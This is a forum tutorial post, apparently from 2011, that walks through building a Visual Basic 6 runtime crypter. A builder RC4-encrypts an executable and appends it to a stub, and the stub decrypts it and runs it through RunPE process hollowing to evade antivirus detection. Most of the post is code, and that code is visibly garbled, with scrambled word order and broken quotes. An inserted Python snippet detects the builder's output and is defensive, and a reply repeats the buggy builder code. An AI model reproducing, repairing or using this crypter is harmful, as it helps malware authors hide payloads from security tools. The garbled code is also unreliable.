Okara Cantt - Pakistan's Biggest IT Education Forum
 █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█

Administrator
PostSubject: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█   Sat Nov 19, 2011 3:50 am

Well, in this tutorial I will explain how to make your own runtime crypter. The crypter is not FUD, but that's not my point here. I just want to show what a runtime crypter is. If you are not familiar with Visual Basic 6, read some basic guidance on how to use it first, so you do not face any problems following this tutorial. So let's get started: for this runtime crypter we need two projects; the first project is the crypter, and the second project will be the stub.

1. The Crypter:

Open a new project, and we will put several components. We need a textbox, two command buttons and a common dialog. And put the following in their properties.
Text1; Text = box which is the file path to encrypt
Command1; Caption = Button that calls the file to encrypt
Command2; Caption = Button to encrypt
CommonDialog1; paste it anywhere in the form
PS: If you can not find the CommonDialog, make sure you have added to the components.

And, the form would look like.


Now double-click Command1, and add these commands.

Code:

  With CommonDialog1
  . DialogTitle = "Select The file you Want to Protect"
  . Filter = "exe Files | *. exe"
  . ShowOpen
 End With

 If Not CommonDialog1.FileName = vbNullString Then

 Text1.Text = CommonDialog1.FileName

 End If

Double click Next Command2 and add these commands.

Code:
 As String Dim Stub

 Open App.Path & "\ Stub.exe 'For As # 1 Binary
 Stub = Space (LOF (1))
 Get # 1,, Stub
 Close # 1

 With CommonDialog1

  . DialogTitle = "Select Where You Want to Save Crypted File"
  . Filter = "EXE Files | *. exe"
  . ShowSave

 End With

 Dim File As String

 Open Text1.Text For Binary As # 1
 File = Space (LOF (1))
 Get # 1, File
 Close # 1

 File = RC4 (File, "therefenge)

 CommonDialog1.FileName Open For Binary As # 1
 Put # 1, Stub & "[Theref]" & File
 Close # 1

 MsgBox "Crypted Successfully", vbInformation

Ok, then you will see codes Command2 Command1 and now we have to RC4 function somewhere, copy this code below Command1 or Command2.

Code:
 Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^
 On Error Resume Next
 Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte
 Key () = StrConv (Password, vbFromUnicode)
 For X = 0 To 255
  Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256
  F (X) = X
 X Next
 Key () = StrConv (Data, vbFromUnicode)
 For X = 0 To Len (Data)
  Y = (Y + F (AND) + 1) Mod 256
  Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254))
 X Next
 RC4 = StrConv (Key, vbUnicode)
 End Function

*******Well, we finished the client.******* *******Now we have to make the Stub.*******

2. Stub:
Ok, open a new project. And eliminate the form1 and you do not need any kind in our crypter. And add 2 modules in it.
The first module will be the main
The second module is the module RunPE

And will look like.


Now, double-click the second module, and put in the form RunPE the following code.

Code:
Option Explicit

 CONTEXT_FULL As Long Private Const = & H10007
 Private Const MAX_PATH As Integer = 260
 CREATE_SUSPENDED As Long Private Const = & H4
 MEM_COMMIT As Long Private Const = & H1000
 MEM_RESERVE As Long Private Const = & H2000
 PAGE_EXECUTE_READWRITE As Long Private Const = & H40

 Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
 Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
 Private Declare Function OutputDebugString Lib "kernel32" Alias ​​"OutputDebugString" (ByVal lpOutputString As String) As Long

 Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
 Private Declare Function CallWindowProc Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
 Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
 Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

 Type Private SECURITY_ATTRIBUTES
 nLength As Long
 As Long lpSecurityDescriptor
 As Long bInheritHandle
 End Type

 Type Private STARTUPINFO
 cb As Long
 As Long lpReserved
 As Long lpDesktop
 As Long lpTitle
 As Long dwX
 As Long dwY
 As Long dwXSize
 As Long dwYSize
 As Long dwXCountChars
 As Long dwYCountChars
 As Long dwFillAttribute
 dwFlags As Long
 wShowWindow As Integer
 cbReserved2 As Integer
 As Long lpReserved2
 As Long hStdInput
 As Long hStdOutput
 As Long hStdError
 End Type

 Type Private PROCESS_INFORMATION
 hProcess As Long
 hThread As Long
 As Long dwProcessId
 As Long dwThreadId
 End Type

 Type Private FLOATING_SAVE_AREA
 As Long ControlWord
 As Long StatusWord
 As Long TagWord
 As Long ErrorOffset
 As Long ErrorSelector
 As Long DataOffset
 As Long DataSelector
 RegisterArea (1 To 80) As Byte
 As Long Cr0NpxState
 End Type

 Type Private CONTEXT
 As Long ContextFlags

 As Long DR0
 Dr1 As Long
 Dr2 As Long
 As Long dr3
 As Long DR6
 As Long DR7

 As FloatSave FLOATING_SAVE_AREA
 As Long SegGs
 As Long SegFs
 As Long SEGESA
 As Long SegDs
 Edi As Long
 Esi As Long
 As Long ebx
 As Long edx
 As Long ecx
 As Long eax
 As Long ebp
 As Long eip
 As Long SegCs
 As Long EFLAGS
 As Long GMT
 As Long SegSs
 End Type

 Type Private IMAGE_DOS_HEADER
 e_magic As Integer
 e_cblp As Integer
 e_cp As Integer
 e_crlc As Integer
 e_cparhdr As Integer
 e_minalloc As Integer
 e_maxalloc As Integer
 e_ss As Integer
 e_sp As Integer
 e_csum As Integer
 e_ip As Integer
 e_cs As Integer
 e_lfarlc As Integer
 e_ovno As Integer
 e_res (0 To 3) As Integer
 e_oemid As Integer
 e_oeminfo As Integer
 e_res2 (0 To 9) As Integer
 As Long e_lfanew
 Type End

 Type Private IMAGE_FILE_HEADER
 Machine As Integer
 NumberOfSections As Integer
 As Long TimeDateStamp
 As Long PointerToSymbolTable
 As Long NumberOfSymbols
 SizeOfOptionalHeader As Integer
 características As Integer
 End Type

 Type Private IMAGE_DATA_DIRECTORY
 As Long VirtualAddress
 Size As Long
 End Type

 Type Private IMAGE_OPTIONAL_HEADER
 Magic As Integer
 MajorLinkerVersion As Byte
 MinorLinkerVersion As Byte
 As Long SizeOfCode
 As Long SizeOfInitializedData
 As Long SizeOfUnitializedData
 As Long AddressOfEntryPoint
 As Long BaseOfCode
 As Long BaseOfData
 'NT Additional fields.
 ImageBase As Long
 As Long SectionAlignment
 As Long FileAlignment
 MajorOperatingSystemVersion As Integer
 MinorOperatingSystemVersion As Integer
 MajorImageVersion As Integer
 MinorImageVersion As Integer
 MajorSubsystemVersion As Integer
 MinorSubsystemVersion As Integer
 As Long W32VersionValue
 As Long SizeOfImage
 As Long SizeOfHeaders
 CheckSum As Long
 SubSystem As Integer
 DllCharacteristics As Integer
 As Long SizeOfStackReserve
 As Long SizeOfStackCommit
 As Long SizeOfHeapReserve
 As Long SizeOfHeapCommit
 As Long LoaderFlags
 As Long NumberOfRvaAndSizes
 DataDirectory (0 To 15) As IMAGE_DATA_DIRECTORY
 End Type

 Type Private IMAGE_NT_HEADERS
 Signature As Long
 As FileHeader IMAGE_FILE_HEADER
 As OptionalHeader IMAGE_OPTIONAL_HEADER
 End Type

 Type Private IMAGE_SECTION_HEADER
 SecName As String * 8
 As Long VirtualSize
 As Long VirtualAddress
 As Long SizeOfRawData
 As Long PointerToRawData
 As Long PointerToRelocations
 As Long PointerToLinenumbers
 NumberOfRelocations As Integer
 NumberOfLinenumbers As Integer
 As Long características
 End Type

 CallAPI Private Function (ByVal slib As String, ByVal smod As String, ParamArray Params ()) As Long
 As Long Dim LPTR
 Dim bvASM (& HEC00 & - 1) As Byte
 Dim i As Long
 As Long Dim LMOD

 LMOD = GetProcAddress (LoadLibraryA (SLIB), smod)
 If LMOD = 0 Then Exit Function

 LPTR = VarPtr (bvASM (0))
 ByVal RtlMoveMemory LPTR, & H59595958, & H4: LPTR = LPTR + 4
 ByVal RtlMoveMemory LPTR, & H5059, & H2: LPTR LPTR + 2 =
 For i = UBound (Params) To 0 Step -1
 ByVal RtlMoveMemory LPTR, & H68, & H1: LPTR LPTR + 1 =
 ByVal RtlMoveMemory LPTR, CLng (Params (i)), & H4: LPTR LPTR + 4 =
 Next
 ByVal RtlMoveMemory LPTR, & HE8, & H1: LPTR LPTR + 1 =
 ByVal RtlMoveMemory LPTR, LMOD - LPTR - 4, & H4: LPTR LPTR + 4 =
 ByVal RtlMoveMemory LPTR, & HC3, & H1: LPTR LPTR + 1 =
 CallAPI = CallWindowProc (VarPtr (bvASM (0)), 0, 0, 0, 0),
 End Function

 Injec Sub (ByVal sHost As String, ByRef bvBuff () As Byte, Parameter As String)
 Dim i As Long
 IHDP Dim As IMAGE_DOS_HEADER
 Dim As IMAGE_NT_HEADERS Pinho
 Pish Dim As IMAGE_SECTION_HEADER
 If Dim As STARTUPINFO
 Dim Pi As PROCESS_INFORMATION
 Ctx Dim As CONTEXT

 Si.cb = Len (Si)

 IHDP RtlMoveMemory, bvBuff (0), 64
 RtlMoveMemory Pinho, bvBuff (Pidh.e_lfanew), 248

 CreateProcessA sHost, "" & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
 CallAPI "ntdll", "NtUnmapViewOfSection" Pi.hProcess, Pinh.OptionalHeader.ImageBase
 CallAPI "kernel32" "VirtualAllocEx" Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT MEM_RESERVE Or, PAGE_EXECUTE_READWRITE
 WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff (0), Pinh.OptionalHeader.SizeOfHeaders, 0

 For i = 0 To Pinh.FileHeader.NumberOfSections - 1
 Pish RtlMoveMemory, bvBuff (Pidh.e_lfanew + 248 + 40 * i), Len (Pish)
 WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff (Pish.PointerToRawData) Pish.SizeOfRawData, 0
 Next i

 Ctx.ContextFlags = CONTEXT_FULL
 CallAPI "kernel32", "GetThreadContext" Pi.hThread, VarPtr (Ctx)
 WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
 Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
 CallAPI "kernel32", "SetThreadContext" Pi.hThread, VarPtr (Ctx)
 CallAPI "kernel32", "ResumeThread" Pi.hThread
 Sub End

 StrToBytArray Public Function (ByVal SSTR As String) As Byte ()
 Dim i As Long
 Dim Buffer () As Byte
 ReDim Buffer (Len (SSTR) - 1)
 For i = 1 To Len (SSTR)
 Buffer (i - 1) = Asc (Mid (SSTR, i, 1))
 Next i
 StrToBytArray = Buffer
 End Function

 ThisExe Public Function () As String
 As Long Dim LRET
 Dim bvBuff (255) As Byte
 CallAPI LRET = ("kernel32", "GetModuleFileNameA" App.hInstance, VarPtr (bvBuff (0)), 256)
 ThisExe $ = Left (StrConv (bvBuff, vbUnicode) LRET)
 End Function

Put these codes in the first module.

Code:
  Sub Main ()

 As String Dim SHIT

 SHIT = App.Path & "\" & App.EXEName & ". Exe"

 Dim Data As String

 SHIT Open For Binary As # 1

 Data = Space (LOF (1))
 Get # 1,, Data
 Close # 1

 Dim Delimiter () As String

 Delimiter () = Split (Data, "[Theref]")

 Delimiter (1) = RC4 (Delimiter (1), "therefenge)

 Injec Call (SHIT, StrConv (Delimiter (1), vbFromUnicode), vbNullString),

 End Sub

 Public Function RC4 (ByVal Data As String, ByVal Password As String) As String 'This is a Modified Function RC4 ^ ^
 On Error Resume Next
 Dim F (0 To 255) As Integer, X, Y As Long, Key () As Byte
 Key () = StrConv (Password, vbFromUnicode)
 For X = 0 To 255
  Y = (Y + F (X) + Key (X Mod Len (Password))) Mod 256
  F (X) = X
 X Next
 Key () = StrConv (Data, vbFromUnicode)
 For X = 0 To Len (Data)
  Y = (Y + F (Y) + 1) Mod 256
  Key (X) = Key (X) XOR F (Temp + F ((Y + F (Y)) Mod 254))
 X Next
 RC4 = StrConv (Key, vbUnicode)
 End Function

Note that the "Sub Main ()" is the first thing the Stub will do when it runs.

Therefore, it should be the crypter and Stub in the same directory. Now, compile the crypter in Crypter.exe (or Etc.exe), but you have to compile the stub as Stub.exe (Just take out the script that needs crypter "Stub.exe").
Having collected all of them, place them in a folder.


Woah! You just make your own Crypter Runtime.
It's all for now, then the stub is left modear Rump or find a less burnt this to be less detected stub...
http://www.okaracantt.com
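
Added example for defenders, not part of the original post: the builder described above writes its output as the stub, then the literal delimiter `[Theref]`, then the encrypted file, so the result is a PE with data appended past its last section. The sketch below flags that on-disk layout statically; the function names and the sample bytes are constructed for illustration, and the delimiter is assumed to be written as single-byte text.

```python
import math
import struct

MARKER = b"[Theref]"  # delimiter the post's builder puts between stub and payload

def pe_end_of_image(data: bytes) -> int:
    """File offset where the last section's raw data ends, or -1 if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return -1
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return -1
    nsec, = struct.unpack_from("<H", data, e_lfanew + 6)       # NumberOfSections
    opt_size, = struct.unpack_from("<H", data, e_lfanew + 20)  # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size
    end = table + 40 * nsec
    if end > len(data):
        return -1
    for i in range(nsec):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 in each header
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end

def entropy(buf: bytes) -> float:
    """Shannon entropy in bits per byte; encrypted data sits close to 8."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)

def scan(data: bytes) -> dict:
    """Flag a PE whose overlay holds the delimiter followed by payload bytes."""
    end = pe_end_of_image(data)
    if end < 0:
        return {"pe": False, "flagged": False}
    overlay = data[min(end, len(data)):]
    pos = overlay.find(MARKER)
    payload = overlay[pos + len(MARKER):] if pos >= 0 else b""
    return {"pe": True, "overlay_size": len(overlay),
            "marker_offset": end + pos if pos >= 0 else -1,
            "payload_entropy": round(entropy(payload), 2),
            "flagged": pos >= 0 and len(payload) > 0}

def build_sample(overlay: bytes) -> bytes:
    """Constructed minimal PE-like file: headers, one 512-byte section, overlay."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x86, 1)      # one section
    struct.pack_into("<H", hdr, 0x94, 0xE0)   # 32-bit optional header size
    struct.pack_into("<II", hdr, 0x80 + 24 + 0xE0 + 16, 0x200, 0x200)
    return bytes(hdr) + bytes(0x200) + overlay
```

A hit on the marker is a signature for this exact builder only; the overlay size and payload entropy are the fields that still say something when the delimiter has been changed.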
pum4

PostSubject: Re: █▂ OC ▂█ Create Your Own Runtime Crypter [FULL GUIDE ] █▂ OC▂█   Fri Mar 09, 2012 12:35 am

button 2 code is bad

As String Dim Stub

Open App.Path & "\ Stub.Exe 'For As # 1 Binary
Stub = Space (LOF (1))
Get # 1,, Stub
Close # 1

With CommonDialog1

. DialogTitle = "Select Where You Want To Save Crypted File"
. Filter = "EXE Files | *. Exe"
. ShowSave

End With

Dim File As String

Open Text1.Text For Binary As # 1
File = Space (LOF (1))
Get # 1, File
Close # 1

File = RC4 (File, "Therefenge)

CommonDialog1.FileName Open For Binary As # 1
Put # 1, Stub & "[Theref]" & File
Close # 1

MsgBox "Crypted Successfully", VbInformation